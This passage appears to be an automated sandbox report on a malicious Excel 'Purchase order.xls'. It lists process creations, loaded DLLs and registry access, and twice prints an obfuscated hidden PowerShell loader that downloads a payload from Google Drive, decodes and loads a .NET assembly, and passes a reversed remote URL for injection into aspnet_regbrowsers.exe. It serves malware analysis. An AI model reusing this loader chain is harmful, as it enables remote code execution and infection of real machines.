b2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: vaultcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: netapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: netutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: srvcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wkscli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: samlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: Purchase order.xlsStatic file information: File size 1081344 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdb source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdbhP source: powershell.exe, 0000000C.00000002.498611259.000000000287C000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: aspnet_regbrowsers.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: aspnet_regbrowsers.pdbl source: aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdb source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdbhP source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
                Source: 23530000.0.drInitial sample: OLE indicators vbamacros = False
                Source: Purchase order.xlsInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 